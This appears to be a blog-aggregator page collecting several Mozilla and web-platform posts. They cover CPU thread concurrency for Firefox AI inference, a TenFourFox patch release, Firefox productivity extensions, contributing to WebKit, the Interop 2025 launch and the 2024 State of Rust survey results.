    • Strict: Includes all Standard protections and also stops known tracking content, such as videos, ads, and other elements with tracking code. Pages load faster, but this setting may block some website functionality.

A cleaner, safer way to browse on iOS

Spring cleaning isn’t just about organizing your space—it’s about clearing out digital clutter too. With Firefox for iOS, you can enjoy a faster, safer browsing experience while blocking trackers that slow you down.

🌿 Give your privacy a fresh start — join the Spring Detox with Firefox today.

Get Firefox

Get the browser that protects what’s important

The post Spring detox with Firefox for iOS appeared first on The Mozilla Blog.

The Mozilla BlogWhat is the best hardware concurrency for running inference on CPU?

In the Firefox AI Runtime, we can use multiple threads in the dedicated inference process to speed up execution times CPU. The WASM/JS environment can create a SharedArrayBuffer and run multiple threads against its content and distribute the load on several CPU cores concurrently.

Below is the time taken in seconds on a MacBook M1 Pro, which has 10 physical cores, using our PDF.js image-to-text model to generate an alt text, with different levels of concurrency:

graph showing the inference duration (Y) depending on the number of threads (X). 8 threads is faster with 800ms

So running several threads is a game-changer ! But using more and more threads will start to slow down execution time to a point where it will become slower than not using threads at all. 

So one question we have asked ourselves was: how can we determine the best number of threads ?

Physical vs logical cores

According to our most recent public data report, on desktop, 81% of our users are equipped with an Intel CPU, 14% with AMD and the rest are mostly Apple devices.

All modern CPUs provide more logical cores (also called “threads”) than physical cores. This happens due to technologies like Intel’s Hyper-Threading. Or AMD’s Simultaneous Multithreading (SMT).

For example, the Intel Core i9-10900K chip has 10 physical cores and 20 logical cores.

When you spin up threads equal to the number of logical cores, you might see performance gains, especially when tasks are I/O bound or if the CPU can effectively interleave instructions.

However, for compute-bound tasks (like heavy ML inference), having more threads than physical cores can lead to diminishing returns, or even performance drops, due to factors like thread scheduling overhead and cache contention.

Not all cores are created equal

On Apple Silicon, you don’t just have a quantity of cores; you have different kinds of cores. Some are high-performance cores designed for heavy lifting, while others are efficiency cores that are optimized for lower power consumption.

For instance, Apple M1 Pro chips have a combination of high-performance (8) and efficiency cores (2). The physical cores might total 10, but each performance core is designed for heavy-duty tasks, while efficiency cores typically handle background tasks that are less demanding. 

When your machine is under load with ML tasks, it’s often better to fully utilize the high-performance cores and leave some breathing room for the efficiency cores to handle background or system processes. 

Similarly, Intel’s processors have different cores, most notably starting with their 12th-generation “Alder Lake” architecture. 

These chips feature Performance-cores (P-cores) designed for demanding, single-threaded tasks, and Efficient-cores (E-cores) aimed at background or less intensive workloads. The P-cores can leverage Intel’s Hyper-Threading technology (meaning each P-core can run two logical threads), while E-cores typically run one thread each. This hybrid approach enables the CPU to optimize power usage and performance by scheduling tasks on the cores best suited for them. Like Apple Silicon’s you’d typically want to maximize utilization of the higher-performance P-cores, while leaving some headroom on the E-cores for system processes. 

Android is close to Apple Silicon’s architecture, as most devices are using ARM’s big.LITTLE (or DynamIQ) architecture – with 2 types of cores: “big” and “LITTLE”.

On mobile Qualcomm’s CPU, there can be three types: “Prime”, “Performance” and “Efficiency”. Most recently, some phones like Samsung Galaxy S24 have gained a fourth kind of core (Exynos 2400) allowing even more combinations.

To summarize, all CPU makers have cores dedicated to performance, and cores for efficiency: 

  • Performance: “P-Core”, “big”, “Prime”, “Performance”
  • Efficiency: “E-Core”, “LITTLE”, “Efficiency”

By combining high-efficiency and high-performance cores, Apple Silicon, Androids, and Intel based devices can strike a better balance between power consumption and raw compute power, depending on the demands of the workload.

But if you try to run all cores (performance + efficiency) at maximum capacity, you may see:

  1. Less optimal thread scheduling, because tasks will bounce between slower efficiency cores and faster performance cores.
  2. Contention for shared resources like the memory bus, cache.
  3. And in extreme cases: thermal throttling if the system overheats, and reaches its Thermal Design Point, in which case the clock speed is throttled to cool down the system. 

This is why simply setting the thread count to “all cores, all the time” can be suboptimal for performance.

AMD on the other hand, does not have efficiency cores. Some CPUs like the Ryzen 5 8000 combine two sizes of cores Zen 4 and Zen 4c, but the latter is not an efficiency core and can also be used to run heavy-duty tasks.

navigator.hardwareConcurrency

In a browser, there is a single and simple API you can call: navigator.hardwareConcurrency

This returns the number of logical cores available. Since it’s the only API available on the web, many libraries (including the one we vendor: onnxruntime) default to using navigator.hardwareConcurrency as a baseline for concurrency.

It’s bad practice to use that value directly as it might overcommit threads as we’ve explained in the previous sections. It’s also not aware of the current system’s activity.

For that reason, ONNX formula takes the number of logical cores divided by two and will never set it higher than 4:

Math.min(4, Math.ceil((navigator.hardwareConcurrency || 1) / 2));

That formula works out ok in general, but will not take advantage of all the cores for some devices. For instance, on an Apple M1 Pro, ML tasks could use a concurrency level up to 8 cores instead of 4.

On the other end of the spectrum, a chip like Intel’s i3-1220p that we use in our CI to run tests in Windows 11, which reflects better what our users have – see our hardware section in our Firefox Public Data Report.  

It has 12 logical cores and 10 physical cores that are composed of 8 efficient cores and 2 performance cores. ONNX formula for that chip means we would run with 4 threads, where 2 would be a better value.

navigator.hardwareConcurrency is a good starting point, but it’s just a blunt instrument. It won’t always yield the true “best” concurrency for a given device and a given workload.

MLUtils.getOptimalCPUConcurrency

While it’s impossible to get the best value at any given time without considering the system activity as a whole, looking at the number of physical cores and not using “efficiency” cores, can help to get to a better value.

Llama.cpp for instance is looking at the number of physical cores to decide for concurrency, with a few twists:

  • On any x86_64, it will return the number of performance cores
  • On Android, and any aarch64-based devices like Apple Silicon  it will return the number of performance cores for tri-layered chips.

We’ve implemented something very similar in a C++ API that can be used via XPIDL in our inference engine:

NS_IMETHODIMP MLUtils::GetOptimalCPUConcurrency(uint8_t* _retval) {
  ProcessInfo processInfo = {};
  if (!NS_SUCCEEDED(CollectProcessInfo(processInfo))) {
    return NS_ERROR_FAILURE;  
  }
  #if defined(ANDROID)
    // On android, "big" and "medium" cpus can be used.
    uint8_t cpuCount = processInfo.cpuPCount + processInfo.cpuMCount;
  #else
  # ifdef __aarch64__
    // On aarch64 (like macBooks) we want to avoid efficient cores and stick with "big" cpus.
    uint8_t cpuCount = processInfo.cpuPCount;
  # else
    // on x86_64 we're always using the number of physical cores.
    uint8_t cpuCount = processInfo.cpuCores;
  # endif
  #endif
  *_retval = cpuCount;
  return NS_OK;
}

This function is then straightforward to use from JS shipped within Firefox to configure concurrency when we run inference:

let mlUtils = Cc["@mozilla.org/ml-utils;1"].createInstance(Ci.nsIMLUtils);
const numThreads = mlUtils.getOptimalCPUConcurrency();

We’ve moved away from using navigator.hardwareConcurrency, and we’re now using this new API.

Conclusion

In our quest to find the optimal number of threads, we’re closer to reality now, but there are other factors to consider. The system will use the CPU for other applications so it’s still possible to overload it.

Using more threads is also going to use more memory in our WASM environment, which can become a real issue. Depending on the workload, each additional thread can add up to 100MiB of physical memory usage in our runtime. We’re working on reducing this overhead but on devices that don’t have a lot of memory, limiting concurrency is still our best option.

For our Firefox ML features, we are using a variety of hardware profiles in our performance CI to make sure that we try them on devices that are close to what our users have. The list of devices we have is going to grow in the next few months to make sure we cover the whole spectrum of CPUs. We’ve started collecting and aggregating metrics on a dashboard that helps us understand what can be expected when our users run our inference engine.

The hardware landscape is also evolving a lot. For example, the most recent Apple devices introduced a new instruction set, called AMX, which used to be proprietary, and gave a significant boost compared to Neon. That has now been replaced by an official API called SME. Similarly, some phones are getting more core types, which could impact how we calculate the number of cores to use. Our current algorithm could be changed the day we leverage these new APIs and hardware in our backend.

Another aspect we have not discussed in this post is using GPU or even more specialized units like NPUs, to offload our ML tasks, which will be a post on its own.

The post What is the best hardware concurrency for running inference on CPU? appeared first on The Mozilla Blog.

Cameron KaiserFebruary patch set for TenFourFox

I was slack on doing the Firefox 128ESR platform rebase for TenFourFox, but I finally got around tuit, mostly because I've been doing a little more work on the Quad G5 and put some additional patches in to scratch my own itches. (See, this is what I mean by "hobby mode.")

The big upgrade is a substantial overhaul of Reader Mode to pick up interval improvements in Readability. I remind folks that I went all-in on Reader Mode for a reason: it's lightweight, it makes little demands of our now antiquated machines (and TenFourFox's antiquated JavaScript runtime), and it renders very, very fast. That's why, for example, you can open a link directly in Reader Mode (right-click, it's there in the menu), the browser defaults to "sticky" Reader Mode where links you click in an article in Reader Mode stay in Reader Mode (like Las Vegas) until you turn it off from the book icon in the address bar, and you can designate certain sites to always open in Reader Mode, either every page or just subpages in case the front page doesn't render well — though that's improved too. (You can configure that from the TenFourFox preference pane. All of these features are unique to TenFourFox.) I also made some subtle changes to the CSS so that it lays out wider, which was really my only personal complaint; otherwise I'm an avid user. The improvements largely relate to better byline and "fluff" text detection as well as improved selection of article inline images. Try it. You'll like it.

I should note that Readability as written no longer works directly on TenFourFox due to syntactic changes and I had to do some backporting. If a page suddenly snaps to the non-Reader view, there was an error. Look in the Browser console for the message and report it; it's possible there is some corner I didn't hit with my own testing.

In addition, there are updates to the ATSUI font blacklist (and a tweak to CFF font table support) and a few low-risk security patches that likely apply to us, as well as refreshed HSTS pins, TLS root certificates, EV roots, timezone data and TLDs. I have also started adding certain AI-related code to the nuisance JavaScript block list as well as some new adbot host aliases I found. Those probably can't run on TenFourFox anyway (properly if at all), but now they won't even be loaded or parsed.

The source code can be downloaded from Github (at the command line you can also just do git clone https://github.com/classilla/tenfourfox.git) and built in the usual way. Remember that these platform updates require a clobber, so you must build from scratch. I was asked about making TenFourFox a bit friendlier with Github; that's a tall order and I'm still thinking about how, but at least the wiki is readable currently even if it isn't very pretty.

Firefox Add-on ReviewsSupercharge your productivity with a Firefox extension

With more work and education happening online (and at home) you may find yourself needing new ways to juice your productivity. From time management to organizational tools and more, the right Firefox extension can give you an edge in the art of efficiency. 

I need help saving and organizing a lot of web content 

Gyazo

Capture, save, and share anything you find on the web. Gyazo is a great tool for personal or collaborative record keeping and research. 

Clip entire pages or just pertinent portions. Save images or take screenshots. Gyazo makes it easy to perform any type of web clipping action by either right-clicking on the page element you want to save or using the extension’s toolbar button. Everything gets saved to your Gyazo account, making it accessible across devices and collaborative teams. 

On your Gyazo homepage you can easily browse and sort everything you’ve clipped; and organize everything into shareable topics or collections.

<figcaption class="wp-element-caption">With its minimalist pop-up interface, Gyazo makes it easy to clip elements, sections, or entire web pages. </figcaption>

Evernote Web Clipper

Similar to Gyazo, Evernote Web Clipper offers a kindred feature set—clip, save, and share web content—albeit with some nice user interface distinctions. 

Evernote places emphasis on making it easy to annotate images and articles for collaborative purposes. It also has a strong internal search feature, allowing you to search for specific words or phrases that might appear across scattered groupings of clipped content. Evernote also automatically strips out ads and social widgets on your saved pages. 

Print Edit WE

If you need to save or print an important web page — but it’s mucked up with a bunch of unnecessary clutter like ads, sidebars, and other peripheral content — Print Edit WE lets you easily remove those unwanted elements.

Along with a host of great features like the option to save web pages as either HTML or PDF files, automatically delete graphics, and the ability to alter text or add notes, Print Edit WE also provides an array of productivity optimizations like keyboard shortcuts and mouse gestures. This is the ideal productivity extension for any type of work steeped in web research and cataloging.

Focus! Focus! Focus!

Anti-distraction and decluttering extensions can be a major boon for online workers and students… 

Block Site 

Do you struggle avoiding certain time-wasting, productivity-sucking websites? With Block Site you can enforce restrictions on sites that tempt you away from good work habits. 

Just list the websites you want to avoid for specified periods of time (certain hours of the day or some days entirely, etc.) and Block Site won’t let you access them until you’re out of the focus zone. There’s also a fun redirection feature where you’re automatically redirected to a more productive website anytime you try to visit a time waster 

<figcaption class="wp-element-caption">Give yourself a custom message of encouragement (or scolding?) whenever you try to visit a restricted site with Block Site</figcaption>

LeechBlock NG

Very similar in function to Block Site, LeechBlock NG offers a few intriguing twists beyond standard site-blocking features. 

In addition to blocking sites during specified times, LeechBlock NG offers an array of granular, website-specific blocking abilities—like blocking just portions of websites (e.g. you can’t access the YouTube homepage but you can see video pages) to setting restrictions on predetermined days (e.g. no Twitter on weekends) to 60-second delayed access to certain websites to give you time to reconsider that potentially productivity killing decision. 

Tomato Clock

A simple but highly effective time management tool, Tomato Clock (based on the Pomodoro technique) helps you stay on task by tracking short, focused work intervals. 

The premise is simple: it assumes everyone’s productive attention span is limited, so break up your work into manageable “tomato” chunks. Let’s say you work best in 40-minute bursts. Set Tomato Clock and your browser will notify you when it’s break time (which is also time customizable). It’s a great way to stay focused via short sprints of productivity. The extension also keeps track of your completed tomato intervals so you can track your achieved results over time.

Tabby – Window & Tab Manager

Are you overwhelmed by lots of open tabs and windows? Need an easy way to overcome desktop chaos? Tabby – Window & Tab Manager to the rescue.

Regain control of your ever-sprawling open tabs and windows with an extension that lets you quickly reorganize everything. Tabby makes it easy to find what you need in a chaotic sea of open tabs — you can not only word/phrase search for the content your looking for, but Tabby also has a visual preview feature so you can get a look at each of your open tabs without actually navigating to them. And whenever you need a clean slate but want to save your work, you can save and close all of your open tabs with a single mouse click and return to them later.

<figcaption class="wp-element-caption">Access all of Tabby’s features in one convenient pop-up. </figcaption>

Tranquility Reader

Imagine a world wide web where everything but the words are stripped away—no more distracting images, ads, tempting links to related stories, nothing—just the words you’re there to read. That’s Tranquility Reader

Simply hit the toolbar button and instantly streamline any web page. Tranquility Reader offers quite a few other nifty features as well, like the ability to save content offline for later reading, customizable font size and colors, add annotations to saved pages, and more. 

We hope some of these great extensions will give your productivity a serious boost! Fact is there are a vast number of extensions out there that could possibly help your productivity—everything from ways to organize tons of open tabs to translation tools to bookmark managers and more. 

Karl DubostSome Ways To Contribute To WebKit and Web Interoperability

Graffiti of a robot on a wall with buildings in the background.

Someone asked me recently how to contribute to the WebKit project and more specifically how to find the low hanging fruits. While some of these are specific to WebKit, they can be easily applied to other browsers. Every browser engines projects have more bugs than they can handle with their teams.

In no specific orders, some ideas for contributing.

Curate Old Bugs on the bug tracker

  1. Go through old bugs of bugs.webkit.org.
  2. Try to understand what the bug is about.
  3. Create simplified test case when there is none and add them as an attachment.
  4. If they show differences in between the browsers, take a screenshot when it’s visual in Safari (WebKit), Firefox (Gecko), Chrome (Blink).
  5. If there is no difference in between browsers, CC: me on the bug, and probably we will be able to close it.

This might help reveal some old fixable bug or make it easier to fix it for another engineer. Some of them might be easy enough that you can start fix them yourself.

Find Out About Broken Stuff On WPT.

  1. Dive into all the bugs which fail in Safari, but pass in Firefox and/or Chrome. (You can do similar search for things failing in Chrome or failing in Firefox.)
  2. Understand what the tests is doing. You can check this with the WPT.live links and/or the associated commit.
  3. Check if the test is not broken and makes sense.
  4. Check if there is an associated bug on bugs.webkit.org. If not, open a new one.

FIXME Hunt Inside WebKit Code

  1. List all the FIXME which are flagged in the WebKit Source code.
  2. Not all of them are easy to fix, but some might be low hanging fruit. That will require to dive in the source code and understand it.
  3. Open a new bug on bugs.webkit.org if not yet existing.
  4. Eventually propose a patch.

Tests WebKit Quirks

  1. There are a number Quirks in the WebKit project. These are in place to hotfix websites not doing the right thing.
  2. Sometimes these Quirks are not needed anymore. The site has made a silent fix. They didn't tell us about it.
  3. They need to be retested and flagged when there are not necessary anymore. This can lead to patches on removing the quirk when it is not needed anymore.
  4. Some of these quirks do not have the remove quirk bug counterpart. It would be good to create the bug for them. Example of a Remove Quirk Bug.

Triage Incoming Bugs On Webcompat.Com For Safari

  1. Time to time there are bugs reported on webcompat.com for Safari.
  2. They require to be analyzed and understood.
  3. Sometimes, a new bug needs to be opened on bugs.webkit.org

Again, this is strongly explaining how to help from the side of WebKit. But these type of participation can be easily transposed for Gecko and Blink. If you have other ideas for fixing bugs, let me know.

Otsukare!

Hacks.Mozilla.OrgLaunching Interop 2025

Launching Interop 2025

The Interop Project is a collaboration between browser vendors and other platform implementors to provide users and web developers with high quality implementations of the web platform.

Each year we select a set of focus areas representing key areas where we want to improve interoperability. Encouraging all browser engines to prioritize common features ensures they become usable for web developers as quickly as possible.

Progress in each engine and the overall Interop score are measured by tracking the pass rate of a set of web-platform tests for each focus area using the Interop dashboard.

Interop 2024

Before introducing the new focus areas for this year, we should look at the successes of Interop 2024.

The Interop score, measuring the percentage of tests that pass in all of the major browser engines, has reached 95% in latest browser releases, up from only 46% at the start of the year. In pre-release browsers it’s even higher — over 97%. This is a huge win that shows how effective Interop can be at aligning browsers with the specifications and each other.

Each browser engine individually achieved a test pass score of 98% in stable browser releases and 99% in pre-release, with Firefox finishing slightly ahead with 98.8% in release and 99.1% in Nightly.

For users, this means features such as requestVideoFrameCallback, Declarative Shadow DOM, and Popover, which a year ago only had limited availability, are now implemented interoperably in all browsers.

Interop 2025

Building on Interop 2024’s success, we are excited to continue the project into 2025. This year we have 19 focus areas; 17 new and 2 from previous years. A full description of all the focus areas is available in the Interop repository.

From 2024 we’re carrying forward Layout (really “Flexbox and Grid”), and Pointer and Mouse Events. These are important platform primitives where the Interop project has already led to significant interoperability improvements. However, with technologies that are so fundamental to the modern web we think it’s important to set ambitious goals and continue to prioritize these areas, creating rock solid foundations for developers to build on.

The new focus areas represent a broad cross section of the platform. Many of them — like Anchor Positioning and View Transitions — have been identified from clear developer demand in surveys such as State of HTML and State of CSS. Inclusion in Interop will ensure they’re usable as soon as possible.

In addition to these high profile new features, we’d like to highlight some lesser-known focus areas and explain why we’re pleased to see them in Interop.

Storage Access

At Mozilla user privacy is a core principle. One of the most common methods for tracking across the web is via third-party cookies. When sites request data from external services, the service can store data that’s re-sent when another site uses the same service. Thus the service can follow the user’s browsing across the web.

To counter this, Firefox’s “Total Cookie Protection” partitions storage so that third parties receive different cookie data per site and thus reduces tracking. Other browsers have similar policies, either by default or in private browsing modes.

However, in some cases, non-tracking workflows such as SSO authentication depend on third party cookies. Storage partitioning can break these workflows, and browsers currently have to ship site-specific workarounds. The Storage Access API solves this by letting sites request access to the unpartitioned cookies. Interop here will allow browsers to advance privacy protections without breaking critical functionality.

Web Compat

The Web Compat focus area is unique in Interop. It isn’t about one specific standard, but focuses on browser bugs known to break sites. These are often in older parts of the platform with long-standing inconsistencies. Addressing these requires either aligning implementations with the standard or, where that would break sites, updating the standard itself.

One feature in the Web Compat focus area for 2025 is CSS Zoom. Originally a proprietary feature in Internet Explorer, it allowed scaling layout by adjusting the computed dimensions of elements at a time before CSS transforms. WebKit reverse-engineered it, bringing it into Blink, but Gecko never implemented it, due to the lack of a specification and the complexities it created in layout calculations.

Unfortunately, a feature not being standardised doesn’t prevent developers from using it. Use of CSS Zoom led to layout issues on some sites in Firefox, especially on mobile. We tried various workarounds and have had success using interventions to replace zoom with CSS transforms on some affected sites, but an attempt to implement the same approach directly in Gecko broke more sites than it fixed and was abandoned.

The situation seemed to be at an impasse until 2023 when Google investigated removing CSS Zoom from Chromium. Unfortunately, it turned out that some use cases, such as Microsoft Excel Online’s worksheet zoom, depended on the specific behaviour of CSS Zoom, so removal was not feasible. However, having clarified the use cases, the Chromium team was able to propose a standardized model for CSS Zoom that was easier to implement without compromising compatibility. This proposal was accepted by the CSS WG and led to the first implementation of CSS Zoom in Firefox 126, 24 years after it was first released in Internet Explorer.

With Interop 2025, we hope to bring the story of CSS Zoom to a close with all engines finally converging on the same behaviour, backed by a real open standard.

WebRTC

Video conferencing is now an essential feature of modern life, and in-browser video conferencing offers both ease of use and high security, as users are not required to download a native binary. Most web-based video conferencing relies on the WebRTC API, which offers high level tools for implementing real time communications. However, WebRTC has long suffered from interoperability issues, with implementations deviating from the standards and requiring nonstandard extensions for key features. This resulted in confusion and frustration for users and undermined trust in the web as a reliable alternative to native apps.

Given this history, we’re excited to see WebRTC in Interop for the first time. The main part of the focus area is the RTCRtpScriptTransform API, which enables cross browser end-to-end encryption. Although there’s more to be done in the future, we believe Interop 2025 will be a big step towards making WebRTC a truly interoperable web standard.

Removing Mutation Events

The focus area for Removing Mutation Events is the first time Interop has been used to coordinate the removal of a feature. Mutation events fire when the DOM changes, meaning the event handlers run on the critical path for DOM manipulation, causing major performance issues, and significant implementation complexity. Despite the fact that they have been implemented in all engines, they’re so problematic that they were never standardised. Instead, mutation observers were developed as a standard solution for the use cases of mutation events without their complexity or performance problems. Almost immediately after mutation observers were implemented, a Gecko bug was filed:

“We now have mutation observers, and we’d really like to kill support for mutation events at some point in the future. Probably not for a while yet.”

That was in 2012. The difficulty is the web’s core commitment to backwards compatibility. Removing features that people rely on is unacceptable. However, last year Chromium determined that use of mutation events had dropped low enough to allow a “deprecation trial“, disabling mutation events by default, but allowing specific sites to re-enable them for a limited time.

This is good news, but long-running deprecation trials can create problems for other browsers. Disabling the feature entirely can break sites that rely on the opt-out. On the other hand we know from experience that some sites actually function better in a browser with mutation events disabled (for example, because they are used for non-critical features, but impact performance).

By including this removal in Interop 2025, we can ensure that mutation events are fully removed in 2025 and end the year with reduced platform complexity and improved web performance.

Interop Investigations

As well as focus areas, the Interop project also runs investigations aimed at long-term interoperability improvements to areas where we can’t measure progress using test pass rates. For example Interop investigations can be looking to add new test capabilities, or increase the test coverage of platform features.

Accessibility Investigation

The accessibility testing started as part of Interop 2023. It has added APIs for testing accessible name and computed role, as well as more than 1000 new tests. Those tests formed the Accessibility focus area in Interop 2024, which achieved an Interop score of 99.7%.

In 2025 the focus will be expanding the testability of accessibility features. Mozilla is working on a prototype of AccessibleNode; an API that enables verifying the shape of the accessibility tree, along with its states and properties. This will allow us to test the effect of features like CSS display: contents or ::before/::after on the accessibility tree.

Mobile Testing Investigation

Today, all Interop focus areas are scored in desktop browsers. However, some features are mobile-specific or have interoperability challenges unique to mobile.

Improving mobile testing has been part of Interop since 2023, and in that time we’ve made significant progress standing up mobile browsers in web-platform-tests CI systems. Today we have reliable runs of Chrome and Firefox Nightly on Android, and Safari runs on iOS are expected soon. However, some parts of our test framework were written with desktop-specific assumptions in the design, so the focus for 2025 will be on bringing mobile testing to parity with desktop. The goal is to allow mobile-specific focus areas in future Interop projects, helping improve interoperability across all device types.

Driving the Web Forward

The unique and distinguishing feature of the web platform is its basis in open standards, providing multiple implementations and user choice. Through the Interop project, web platform implementors collaborate to ensure that these core strengths are matched by a seamless user experience across browsers.

With focus areas covering some of the most important new and existing areas of the modern web, Interop 2025 is set to deliver some of the biggest interoperability wins of the project so far. We are confident that Firefox and other browsers will rise to the challenge, providing users and developers with a more consistent and reliable web platform.

Partner Announcements

The post Launching Interop 2025 appeared first on Mozilla Hacks - the Web developer blog.

The Rust Programming Language Blog2024 State of Rust Survey Results

Hello, Rustaceans!

The Rust Survey Team is excited to share the results of our 2024 survey on the Rust Programming language, conducted between December 5, 2024 and December 23, 2024. As in previous years, the 2024 State of Rust Survey was focused on gathering insights and feedback from Rust users, and all those who are interested in the future of Rust more generally.

This ninth edition of the survey surfaced new insights and learning opportunities straight from the global Rust language community, which we will summarize below. In addition to this blog post, we have also prepared a report containing charts with aggregated results of all questions in the survey.

Our sincerest thanks to every community member who took the time to express their opinions and experiences with Rust over the past year. Your participation will help us make Rust better for everyone.

There's a lot of data to go through, so strap in and enjoy!

Participation

Survey Started Completed Completion rate Views
2023 11 950 9 710 82.2% 16 028
2024 9 450 7 310 77.4% 13 564

As shown above, in 2024, we have received fewer survey views than in the previous year. This was likely caused simply by the fact that the survey ran only for two weeks, while in the previous year it ran for almost a month. However, the completion rate has also dropped, which seems to suggest that the survey might be a bit too long. We will take this into consideration for the next edition of the survey.

Community

The State of Rust survey not only gives us excellent insight into how many Rust users around the world are using and experiencing the language but also gives us insight into the makeup of our global community. This information gives us a sense of where the language is being used and where access gaps might exist for us to address over time. We hope that this data and our related analysis help further important discussions about how we can continue to prioritize global access and inclusivity in the Rust community.

Same as every year, we asked our respondents in which country they live in. The top 10 countries represented were, in order: United States (22%), Germany (14%), United Kingdom (6%), France (6%), China (5%), Canada (3%), Netherlands (3%), Russia (3%), Australia (2%), and Sweden (2%). We are happy to see that Rust is enjoyed by users from all around the world! You can try to find your country in the chart below:

We also asked whether respondents consider themselves members of a marginalized community. Out of those who answered, 74.5% selected no, 15.5% selected yes, and 10% preferred not to say.

We have asked the group that selected “yes” which specific groups they identified as being a member of. The majority of those who consider themselves a member of an underrepresented or marginalized group in technology identify as lesbian, gay, bisexual, or otherwise non-heterosexual. The second most selected option was neurodivergent at 46% followed by trans at 35%.

<noscript> <img alt="which-marginalized-group" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/which-marginalized-group.png" /> </noscript>
[PNG] [SVG]

Each year, we must acknowledge the diversity, equity, and inclusivity (DEI) related gaps in the Rust community and open source as a whole. We believe that excellent work is underway at the Rust Foundation to advance global access to Rust community gatherings and distribute grants to a diverse pool of maintainers each cycle, which you can learn more about here. Even so, global inclusion and access is just one element of DEI, and the survey working group will continue to advocate for progress in this domain.

Rust usage

The number of respondents that self-identify as a Rust user was quite similar to last year, around 92%. This high number is not surprising, since we primarily target existing Rust developers with this survey.

Similarly as last year, around 31% of those who did not identify as Rust users cited the perception of difficulty as the primary reason for not using Rust. The most common reason for not using Rust was that the respondents simply haven’t had the chance to try it yet.

<noscript> <img alt="why-dont-you-use-rust" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/why-dont-you-use-rust.png" /> </noscript>

Of the former Rust users who participated in the 2024 survey, 36% cited factors outside their control as a reason why they no longer use Rust, which is a 10pp decrease from last year. This year, we also asked respondents if they would consider using Rust again if an opportunity comes up, which turns out to be true for a large fraction of the respondents (63%). That is good to hear!

<noscript> <img alt="why-did-you-stop-using-rust" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/why-did-you-stop-using-rust.png" /> </noscript>

Closed answers marked with N/A were not present in the previous version(s) of the survey.

Those not using Rust anymore told us that it is because they don't really need it (or the goals of their company changed) or because it was not the right tool for the job. A few reported being overwhelmed by the language or its ecosystem in general or that switching to or introducing Rust would have been too expensive in terms of human effort.

Of those who used Rust in 2024, 53% did so on a daily (or nearly daily) basis — an increase of 4pp from the previous year. We can observe an upward trend in the frequency of Rust usage over the past few years, which suggests that Rust is being increasingly used at work. This is also confirmed by other answers mentioned in the Rust at Work section later below.

<noscript> <img alt="how-often-do-you-use-rust" height="300" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/how-often-do-you-use-rust.png" /> </noscript>
[PNG] [SVG]

Rust expertise is also continually increasing amongst our respondents! 20% of respondents can write (only) simple programs in Rust (a decrease of 3pp from 2023), while 53% consider themselves productive using Rust — up from 47% in 2023. While the survey is just one tool to measure the changes in Rust expertise overall, these numbers are heartening as they represent knowledge growth for many Rustaceans returning to the survey year over year.

<noscript> <img alt="how-would-you-rate-your-rust-expertise" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/how-would-you-rate-your-rust-expertise.png" /> </noscript>
[PNG] [SVG]

Unsurprisingly, the most popular version of Rust is latest stable, either the most recent one or whichever comes with the users' Linux distribution. Almost a third of users also use the latest nightly release, due to various reasons (see below). However, it seems that the beta toolchain is not used much, which is a bit unfortunate. We would like to encourage Rust users to use the beta toolchain more (e.g. in CI environments) to help test soon-to-be stabilized versions of Rust.

<noscript> <img alt="which-version-of-rust-do-you-use" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/which-version-of-rust-do-you-use.png" /> </noscript>

People that use the nightly toolchain mostly do it to gain access to specific unstable language features. Several users have also mentioned that rustfmt works better for them on nightly or that they use the nightly compiler because of faster compilation times.

<noscript> <img alt="if-you-use-nightly-why" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/if-you-use-nightly-why.png" /> </noscript>

Learning Rust

To use Rust, programmers first have to learn it, so we are always interested in finding out how do they approach that. Based on the survey results, it seems that most users learn from Rust documentation and also from The Rust Programming Language book, which has been a favourite learning resource of new Rustaceans for a long time. Many people also seem to learn by reading the source code of Rust crates. The fact that both the documentation and source code of tens of thousands of Rust crates is available on docs.rs and GitHub makes this easier.

<noscript> <img alt="what-kind-of-learning-materials-have-you-consumed" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/what-kind-of-learning-materials-have-you-consumed.png" /> </noscript>

In terms of answers belonging to the "Other" category, they can be clustered into three categories: people using LLM (large language model) assistants (Copilot, ChatGPT, Claude, etc.), reading the official Rust forums (Discord, URLO) or being mentored while contributing to Rust projects. We would like to extend a big thank you to those making our spaces friendly and welcoming for newcomers, as it is important work and it pays off. Interestingly, a non-trivial number of people "learned by doing" and used rustc error messages and clippy as a guide, which is a good indicator of the quality of Rust diagnostics.

In terms of formal education, it seems that Rust has not yet penetrated university curriculums, as this is typically a very slowly moving area. Only a very small number of respondents (around 3%) have taken a university Rust course or used university learning materials.

<noscript> <img alt="have-you-taken-a-rust-course" height="400" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/have-you-taken-a-rust-course.png" /> </noscript>
[PNG] [SVG]

Programming environment

In terms of operating systems used by Rustaceans, Linux was the most popular choice, and it seems that it is getting increasingly popular year after year. It is followed by macOS and Windows, which have a very similar share of usage.

As you can see in the wordcloud, there are also a few users that prefer Arch, btw.

Rust programmers target a diverse set of platforms with their Rust programs. We saw a slight uptick in users targeting embedded and mobile platforms, but otherwise the distribution of platforms stayed mostly the same as last year. Since the WebAssembly target is quite diverse, we have split it into two separate categories this time. Based on the results it is clear that when using WebAssembly, it is mostly in the context of browsers (23%) rather than other use-cases (7%).

<noscript> <img alt="which-os-do-you-target" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/which-os-do-you-target.png" /> </noscript>

We cannot of course forget the favourite topic of many programmers: which IDE (developer environment) they use. Although Visual Studio Code still remains the most popular option, its share has dropped by 5pp this year. On the other hand, the Zed editor seems to have gained considerable traction recently. The small percentage of those who selected "Other" are using a wide range of different tools: from CursorAI to classics like Kate or Notepad++. Special mention to the 3 people using "ed", that's quite an achievement.

<noscript> <img alt="what-ide-do-you-use" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/what-ide-do-you-use.png" /> </noscript>

You can also take a look at the linked wordcloud that summarizes open answers to this question (the "Other" category), to see what other editors are also popular.

Rust at Work

We were excited to see that more and more people use Rust at work for the majority of their coding, 38% vs 34% from last year. There is a clear upward trend in this metric over the past few years.

The usage of Rust within companies also seems to be rising, as 45% of respondents answered that their organisation makes non-trivial use of Rust, which is a 7pp increase from 2023.

